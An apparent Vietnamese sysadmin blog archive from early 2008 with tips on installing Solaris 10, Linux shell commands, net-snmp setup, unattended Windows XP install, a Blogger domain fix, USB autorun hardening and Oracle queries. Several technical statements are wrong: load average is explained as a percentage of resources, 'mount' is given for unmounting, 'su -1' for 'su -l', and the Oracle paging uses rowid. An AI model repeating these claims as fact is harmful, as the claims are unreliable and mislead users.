Đây là phần lựa chọi ổ đĩa cứng cho Solaris. Tôi chỉ có một ổ cứng nên để tất cả như mặc định.

Màn hình Select Disks for fdisk Partition Customization
Đây là phần chia cắt ổ cứng bằng chương trình fdisk. Tôi để như mặc định.

Màn hình Customize fdisk Partitions-- Disk c0d0
Tôi nhấn Default

Màn hình Lay Out File Systems
Tôi để tất cả như mặc định.

Màn hình Ready to Install
Cuối cùng chúng ta cũng tới bước này, tôi để mặc định: Install Now

Tôi đợi từ 17:10 tới 18:10 (đúng một giờ đồng hồ) để trình cài đặt hoàn thành các bước còn lại. Khi Solaris khởi động lại máy, bạn nhớ lấy đĩa DVD cài đặt ra, nếu không trình cài đặt sẽ bắt đầu lại qúa trình ban nãy - những việc mà chúng ta chỉ cần để Solaris làm đúng một lần.

Solaris được khởi động lần đầu tiên. Có thể bạn sẽ gặp một vài cảnh cáo liên quan đến NFS hay sendmail, kiểu như: Solaris console login: .... My unqualified host name (localhost) unknown; sleeping for retry. Chúng ta sẽ xử lý những cảnh báo này sau. Bây giờ chúng ta tạm bỏ qua những cảnh báo để đối diện với một màn hình login cực kỳ ấn tượng như hình dưới đây.

Bạn có thể chọn sử dụng 1 trong hai loại desktop là CDE (Common Desktop Environment) hoặc JDS (Java Desktop System, Release 3). CDE là môi trường desktop chuẩn của Solaris, JDS là môi trường desktop mới được phát triển, bạn dễ dàng chuyển đổi giữa hai môi trường này bằng việc lựa chọn Session từ màn hình login. Trước mắt tôi chọn CDE như mặc định. Nhập user name là root, password của root, [Enter]

Bạn nên dành một thời gian chừng 1 tiếng để "làm quen" và "dạo chơi" với CDE. Sau đó hãy chuyển sang JDS. Người từng làm việc với CDE sẽ thấy Solaris 10 có một workspace mới rất duyên dáng. Chắc chắn tôi sẽ làm việc nhiều trên workspace này.

Các lệnh Shell cơ bản trong Linux

Chú ý rằng mỗi lệnh đều có nhiều tùy chọn riêng của mình. Để xem các tùy chọn cho một lệnh cụ thể, đơn giản bạn chỉ cần gõ "man " (trong đó: man là từ khóa; command là tên lệnh). Một điểm quan trọng cần chú ý là trong các hệ điều hành Linux, câu lệnh có phân biệt chữ hoa, chữ thường. “A” sẽ được hệ điều hành hiểu là khác so với “a”.

Để vào hệ thống file, dùng:

- pwd: đưa ra ngoài màn hình thư mục đang hoạt động (ví dụ: /etc/ssh).

- cd: thay đổi thư mục (ví dụ: cd .. – ra một cấp thư mục hiện tại; cd vidu – vào thư mục /vidu).

- ls: đưa ra danh sách nội dung thư mục.

- mkdir: tạo thư mục mới (mkdir tên_thumuc).

- touch: tạo file mới (touch ten_file).

- rmdir: bỏ một thư mục (rmdir ten_thumuc).

- cp: copy file hoặc thư mục (cp file_nguồn file_đích).

- mv: di chuyển file hoặc thư mục; cũng được dùng để đặt lại tên file hoặc thư mục (mv vị_trí_cũ vị_trí_mới hoặc mv tên_cũ tên_mới).

- rm: loại bỏ file (rm tên_file).

Để tìm kiếm file, bạn có thể dùng:

- find : dùng cho các tên file.

- grep <>: để tìm nội dung trong file.

Để xem một file, bạn có thể dùng:

- more : hiển thị file theo từng trang.

- cat <>: hiển thị tất cả file.

- head <>: hiển thị các dòng đầu tiên.

- tail <>: hiển thị các dòng cuối cùng (có thể hữu ích trong những trường hợp như khi bạn muốn xem thông tin cuối cùng của một file hệ thống).

Để chính sửa file, bạn phải sử dụng trình soạn thảo tích hợp sẵn trên dòng lệnh. Thông thường, đây là vi và được dùng với cú pháp: vi .

Để giải nén một lưu trữ (thông thường có đuôi tar.gz), bạn phải dùng lệnh tar với cú pháp tar -xvf .

Để in một file, dùng lệnh lpr . Chú ý là bạn phải có một số daemon hoạt động để quản lý máy in. Thông thường đây là các cup (chủ yếu là UNIX Printing System) có thể sử dụng cho tất cả các phân phối chính.

Để loại bỏ file khỏi hàng đợi ở máy in (bạn có thể lên danh sách hàng đợi bằng lệnh lpq), sử dụng câu lệnh lprm .

Để lắp hoặc gỡ bỏ thiết bị (thêm vào hệ thống file với vai trò như một phương tiện được phép sử dụng), dùng:

- mount /mnt/floppy: lắp thêm ổ mềm.

- umount /mnt/floppy: gỡ bỏ ổ mềm.

- mount /mnt/cdrom: lắp ổ CD-ROM.

- mount /mnt/cdrom: gỡ ổ DC-ROM.

Các thiết bị này thường được cài và cho phép sử dụng một cách tự động. Nhưng có thể một ngày đẹp trời nào đó bạn lại phải tự mình thực hiện công việc này khi có lỗi xảy ra. Đừng lo lắng!

Để tạo một phân vùng

Đầu tiên, tạo một thư mục trong /mnt (mkdir /mnt/ổ_đĩa_mới). Sau đó sử dụng lệnh mount (mount /dev/source /mnt/ ổ_đĩa_mới), trong đó /dev/source là thiết bị (tức phân vùng) bạn muốn lắp thêm vào hệ thống file.

Nếu muốn kết nối tới một host từ xa, sử dụng lệnh ssh. Cú pháp là ssh .

Quản lý hệ thống:

- ps: hiển thị các chương trình hiện thời đang chạy (rất hữu ích: ps là cái nhìn toàn bộ về tất cả các chương trình).

Trong danh sách đưa ra khi thực hiện lệnh ps, bạn sẽ thấy có số PID (Process identification - nhân dạng tiến trình).

Con số này sẽ được hỏi đến khi muốn ngừng một dịch vụ hay ứng dụng, dùng lệnh kill .

- top: hoạt động khá giống như Task Manager trong Windows. Nó đưa ra thông tin về tất cả tài nguyên hệ thống, các tiến trình đang chạy, tốc độ load trung bình… Lệnh top -d thiết lập khoảng thời gian làm tươi lại hệ thống. Bạn có thể đặt bất kỳ giá trị nào, từ .1 (tức 10 mili giây) tới 100 (tức 100 giây) hoặc thậm chí lớn hơn.

- uptime: thể hiện thời gian của hệ thống và tốc độ load trung bình trong khoảng thời gian đó, trước đây là 5 phút và 15 phút.

Thông thường tốc độ load trung bình được tính toán theo phần trăm tài nguyên hệ thống (vi xử lý, RAM, ổ cứng vào/ra, tốc độ load mạng) được dùng tại một thời điểm. Nếu tốc độ được tính toán là 0.37, tức có 37% tài nguyên được sử dụng. Giá trị lớn hơn như 2.35 nghĩa là hệ thống phải đợi một số dữ liệu, khi đó nó sẽ tính toán nhanh hơn 235% mà không gặp phải vấn đề gì. Nhưng giữa các phân phối có thể khác nhau một chút.

- free: hiển thị thông tin trên bộ nhớ hệ thống.

- ifconfig : để xem thông tin chi tiết về các giao diện mạng; thông thường giao diện mạng ethernet có tên là eth(). Bạn có thể cài đặt các thiết lập mạng như địa chỉ IP hoặc bằng cách dùng lệnh này (xem man ifconfig). Nếu có điều gì đó chưa chính xác, bạn có thể stop hoặc start (tức ngừng hoặc khởi_động) giao diện bằng cách dùng lệnh ifconfig up/down.

- passwd: cho phép bạn thay đổi mật khẩu (passwd người_dùng_sở_hữu_mật_khẩu hoặc tên người dùng khác nếu bạn đăng nhập hệ thống với vai trò root).

- useradd: cho phép bạn thêm người dùng mới (xem man useradd).

Dù ở phân phối nào, bạn cũng có thể dùng phím TAB để tự động hoàn chỉnh một lệnh hoặc tên file. Điều này rất hữu ích khi bạn quen với các lệnh. Bạn cũng có thể sử dụng các phím lên, xuống để cuộn xem các lệnh đã nhập. Bạn có thể dùng lệnh đa dòng trên một dòng. Ví dụ như, nếu muốn tạo ba thư mục chỉ trên một dòng, cú pháp có thể là: mkdir thư_mục_1 ; mkdir thư_mục_2 ; mkdir thư_mục_3.

Một điều thú vị khác nữa là các lệnh dạng pipe. Bạn có thể xuất một lệnh thông qua lệnh khác. Ví dụ: man mkdir | tail sẽ đưa ra thông tin các dòng cuối cùng trong trang xem "thủ công" của lệnh mkdir.

Nếu lúc nào đó được yêu cầu phải đăng nhập với tài khoản gốc (tức "siêu" admin của hệ thống), bạn có thể đăng nhập tạm thời bằng cách dùng lệnh su. Tham số -1 (su-1) dùng để thay đổi thư mục chủ và cho các lệnh đã hoặc đang dùng. Chú ý là bạn cũng sẽ được nhắc một mật khẩu.

Để thoát hay đóng shell, gõ exit hoặc logout.

Thursday, January 24, 2008

Windows Media Player Firefox Plugin Xp or Server 2003

Windows Media Player Firefox Plugin Xp e Server 2003 - Download

wmpfirefoxplugin_(removed_checking_for_server).zip

Monday, January 21, 2008

Cấu hình SNMP

Giới thiệu

SNMP: Simple Network Management Protocol

Cấu hình SNMP

Phần 1: Cài đặt snmp

Cài những gói net-snmp, net-snmp-utils

Cho người dùng FC:

# yum install net-snmp net-snmp-utils

Phần 2: Cấu hình

Chỉnh sửa file cấu hình snmpd.conf (FC user: /etc/snmp/snmpd.conf)

Trích dẫn:

###########################################
# Access Control (Quyền truy nhập thông tin)
###########################################
# First, map the community name “public” into a “security name”
# thay “MậtkhẩuSNMP” bằng một chuỗi ký tự
com2sec local localhost MậtkhẩuSNMP
com2sec myLAN 192.168.1.0/24 MậtkhẩuSNMP# Second, map the security name into a group name:
# RWGroup: quyền đọc/viết (Read, Write)
# ROGroup: chỉ có quyền đọc (Read Only)
group RWGroup v1 local
group RWGroup v2c local
group RWGroup usm local
group ROGroup v1 myLAN
group ROGroup v2c myLAN
group ROGroup usm myLAN# Third, create a view for us to let the group have rights to:
view all included .1 80

# Finally, grant the group read-only access to the systemview view.
# group context sec.model sec.level prefix read write notif
access ROGroup “” any noauth exact all none none
access RWGroup “” any noauth exact all all none

##############################
# System contact information
##############################
syslocation Công ty XXX
syscontact Admin

#######################################
# disk checks (kiểm tra dung lượng HDD)
#######################################
# báo lỗi nếu / partition còn ít hơn 100 MB, /var còn ít hơn 500 MB
disk / 100000
disk /var 500000

############################################
# load average checks (kiểm tra tải của CPU)
############################################
# báo lỗi nếu vượt mức trung bình sau đây (1, 5, 15 phút)
# load [1MAX=12.0] [5MAX=13.0] [15MAX=14.0]
load 12 13 14

Phần 3: Khởi động snmpd

Cho người dùng FC

// tự động chạy mỗi khi bật máy
# chkconfig –level 3 snmpd on
// khởi động cho lần đầu tiên
# /etc/init.d/snmpd start

Phần 4: Kiểm tra hoạt động

Sử dụng lệnh snmpwalk để xem một số thông tin hệ thống

Trích dẫn:

// ———————————–
// phần memory còn thừa (chưa sử dụng)
$snmpwalk -v 1 -c MậtkhẩuSNMP localhost .1.3.6.1.4.1.2021.4.6.0
// kết quả: 120 MB RAM chưa sử dụng
UCD-SNMP-MIB::memAvailReal.0 = INTEGER: 120400// ———————————–
// dung lượng HDD, / partition
$ snmpwalk -v 1 -c MậtkhẩuSNMP localhost .1.3.6.1.4.1.2021.9.1.9.1
// kết quả: đã sử dụng 13%
UCD-SNMP-MIB::dskPercent.1 = INTEGER: 13// ———————————–
// số user đang login vào hệ thống
$ snmpwalk -v 1 -c MậtkhẩuSNMP localhost hrSystemNumUsers.0
// có 70 users
HOST-RESOURCES-MIB::hrSystemNumUsers.0 = Gauge32: 70

// ———————————–
// số TCP connection đang mở
$ snmpwalk -v 1 -c MậtkhẩuSNMP localhost .1.3.6.1.2.1.6.9.0
// có 123 open connections
TCP-MIB::tcpCurrEstab.0 = Gauge32: 123

Tham khảo, thông tin thêm

1. Xem MIB tree: Mbrowse is an SNMP MIB browser based on GTK and net-snmp. It is released under the GPL.

Sunday, January 20, 2008

Tạo đĩa cài Windows tự động

Đầu tiên bạn copy toàn bộ hoặc phần I386 trong ổ CD của bạn vào một thư mục nào đó trong ổ C hay ổ D của bạn : ví dụ ở đây tôi đặt vào trong folder D:XP2.

Sau đó bạn vào phần E:\SUPPORTTOOLS trong ổ CD của bạn(ở đây là ổ E), bạn sẽ nhìn thấy file Deloy.cab sau đó bạn giải nén file này ra thư mục XP2 mình vừa tạo.

Sau khi giải nén xong vào thư mục D:XP2 click chuột vào file setupmgr.exe (một trong những file vừa giải nén), nó sẽ hiện lên :
+ form "setup manager" có 2 option là "create new" và "modify existing" chọn "Create new"
--> next
+ tiếp theo là form "type of setup" ta chọn "Unattended Setup"
+ form Product chọn là "Windown XP Pro" nếu bạn muốn tạp file tự động cài cho WinXP hoặc bạn có thể chọn option "2003" (lưu ý bộ cài của bạn là win gì thì bạn tạo win đó) rồi click "Next".
+ User Interaction :chọn Fully Automated --> Next
+ Distribution Share: Set up from CD
+ Tiếp theo các bạn gặp một số cửa sổ như trong quá trình cài đặt Windows bình thường, bạn hãy chọn Accept the Licence Agreement, điền vào các thông tin cần thiết khi cài đặt như: Key, workgroup, name.....
Nếu phần nào bạn không biết rõ bạn có thể bỏ qua, Windows sẽ tự động chọn thông số mặc định.
Sau khi bạn điền xong chương trình sẽ tạo ra một file gọi là unattend.txt. Bạn hãy đổi tên file này thành WINNT.SIF.
Nếu bạn muốn tự mình chọn phân vùng để cài đặt hay định dạng lại phân vùng bạn hãy sửa lại một số dòng sau trong tệp Winnt.sif
[Data]
AutoPartition=0

[Unattended]
FileSystem=*

Sau đó bạn hãy copy file winnt.sif vào thư mục I386 trong thư mục gốc mà bạn đã tạo ban đầu(D:XP2I386).
Vậy là chúng ta đã tạo xong đĩa Windows tự cài đặt

Chúc bạn thành công

Saturday, January 19, 2008

A Solution to "Another blog is already hosted at this address." error

A solution has been found.....

The problem stems from Google Apps for Your Domain....here is how I
fixed the issue of the "Another blog is
already hosted at this address." error.

1. Go to your domain registrar, (I needed reset everything to their default settings) and create (or change if already existing) a CNAME named "www" and point it to "ghs.google.com"

2. Logged into Google Apps for Your Domain or create a new account if you do not have one. (I had decided to set up an account AFTER originally setting up my custom domain on blogger.com....this inadvertently led to all of my problems)

3. Once logged in, from the "Dashboard" choose to ONLY add "Domain web pages" and click the "Add selected services" button.

4. Use the CNAME subdomain that has been giving the message "Another blog is already hosted at this address." error in Blogger as the address you want to publish to. (In my case "www")

5. From here I chose to create a simple "Google Pages" webpage just to confirm that my address (http://www.websitefreetips.com) was indeed working.

6. Back on the Dashboard of Google Apps for Your Domain, choose to remove the "Domain web pages service"

7. Go to your blog on blogger.com and change the custom address to the problematic address (In my case "www.websitefreetips.com"), blogger should now allow it.

8. In my case, when I would click the "View Blog" link...blogger now took me to the Google Pages page I had just created in Google Apps for Your Domain.

9. This step my be redundant and actually just require time for the DNS to refresh, but I logged back into Google Apps for Your Domain and proceeded to add the "Domain web pages service" back, but this time I used a different subdomain (not "www" but instead I used "blog"). I
never bothered to set up a CNAME in my registrar settings as I was only attempting to get Google Apps for Your Domain to "let go" of the "www" subdomain.

10. All of these actions soon caused the "Google 404 not found" page to appear for my site address.

11. I then proceeded to again remove the "Domain web pages service".

12. After only a few moments of waiting for the DNS to catch up, my domain (http://www.websitefreetips.com) was now working and opening my blog.

Sunday, January 13, 2008

Giúp USB chống lại virus autorun


Thủ thuật nhỏ này tuy không ngăn chặn được toàn bộ các loại virus lây lan qua USB nhưng cũng hạn chế được một phần nào sức tấn công, bảo vệ cho USB cũng như máy tính của bạn.

Hiện nay, các loại virus lây lan qua USB khá phổ biến, có nhiều biển thể khác nhau. Tuy vậy, một phần lớn trong số đó đều có một đặc điểm chung là sẽ tạo ra một file autorun tự khởi động ngay khi người sử dụng kết nối USB với máy tính và từ đó lây lan ra toàn máy cũng như các máy tính liên kết trong mạng.

Một các giải quyết khá đơn giản cho vấn đề này là chúng ta sẽ tạo ra một file chạy autorun mặc định trước cho USB với những khả năng không bị đánh bật ra khi các loại virus xâm nhập và tự tạo file chạy của riêng nó.

Bước 1: Với thế hệ ổ flash USB có dung lượng lớn hiện nay đều có thể chuyển sang định dạng NTFS thay cho mặc định FAT/FAT32. Với định dạng NTFS, hệ thống của USB sẽ được bảo mật chặt chẽ hơn, với việc chia quyền truy cập cấp cao. Chọn Start vào Run sau đó gõ: Convert : /FS:NTFS. Ví dụ ổ USB của bạn là ổ D thì gõ như sau: Convert D: /FS:NTFS. Cách này có thể áp dụng cho cả ổ cứng. Một cách đơn giản hơn là click chuột phải vào biểu tượng USB trong My Computer, chọn Format, trong phần định dạng ổ thì chuyển sang NTFS nhưng với thao tác này dữ liệu của bạn sẽ bị xóa hết do đó hãy sao lưu những gì quan trọng trước khi làm.

Bước 2: Tạo một file autorun.inf bất kỳ, nhớ rằng chỉ cần đặt tên file là như vậy, còn nội dung bạn có thể bỏ không. Tiếp đó click chuột phải vào file vừa tạo ra và chọn thuộc tính read-only để không thể sửa đổi những nội dung của file này.

Bước 3: Để tăng tính bảo mật hơn nữa của file autorun.inf vừa tạo ra, chúng ta sẽ cấm mọi quyền truy xuất đến tập tin này bằng cách vào Run thực hiện: cacls \autorun.inf /D Everyone. Ví dụ USB của bạn là ổ D, ta sẽ có: cacls D: \autorun.inf/D Everyone. Rồi sau đó chọn chế độ hidden cho file chạy này.

Tuesday, January 8, 2008

Sử dụng hàm LIMIT của Oracle

// mysql
select col from tbl limit 20;

// Oracle
select col from tbl where rownum<=20;

// Microsoft SQL
select top 20 col from tbl;

VD: Oracle

SELECT * FROM ( SELECT rowid as ID,field1,field2,field3 FROM mytable ) WHERE id BETWEEN 20 AND 40

Vd: MySQL

SELECT * FROM employee LIMIT 20,10

Saturday, January 5, 2008

Chèn logo riêng vào hộp thoại System Properties

Cách thực hiện: Chuẩn bị một ảnh mà chủ nhân máy tính muốn để làm logo hiển thị trong System Properties với kích thước 115x182 pixels và lưu lại với tên oemlogo.bmp

Tạo một file text có nội dung như sau: [general]
Manufacturer=
Model=
[Support Information]
Line1=
Line2=

Ở phần Manufacturer bạn có thể gõ tên mình, tên công ty… để xác lập quyền sở hữu (vd ở đây đặt tên là “dantri.com.vn”). Còn nghề nghiệp thì điền vào phần Model (vd ở đây điền là “Bao dien tu Viet Nam”. Còn Line1, Line2 là phần phụ chú mở rộng bên ngoài bạn có thể điền hay không điền cũng được. Ngoài ra bạn cũng có thể thêm vào các Line3, Line4… tiếp tục phía sau tùy ý. Lưu ý: tất cả đều chỉ chấp nhận gõ chữ không dấu. Sau khi hoàn thành thì save lại với tên oeminfo.ini

VD: thao tác sẽ như sau:

[general]
Manufacturer= Dantri.com.vn
Model= Bao dien tu Viet Nam
[Support Information]
Line1= Thong tin cap nhat
Line2= Khong ngưng phat trien

Sau khi đã có oemlogo.bmp oeminfo.ini bạn copy 2 file này vào thư mục C:\WINDOWS\SYSTEM\(với hệ điều hành cũ) và C:\ WINDOWS\SYSTEM32\ (với hệ điều hành XP).





Và bây giờ chỉ cần vào lại hộp thoại System Properties hình ảnh logo và những thông tin của riêng bạn đã xuất hiện đầy cá tính, thể hiện quyền sở hữu độc quyền của chủ nhân trên chiếc PC yêu quý.

Wednesday, January 2, 2008

Một số lệnh đơn giản của Oracle

Import/Export database

exp system/manager@databaseA full=y file=myfile.dmp
imp system/manager@databaseB file=myfile.dmp fromuser=u1 touser=u1
imp system/manager@databaseB file=myfile.dmp fromuser=u2 touser=u2

Tạo người dùng và cấp quyền cho User

SQL> create user dvp identified by dvp ;
SQL> grant dba to dvp ;
SQL> conn dvp/dvp
Connect.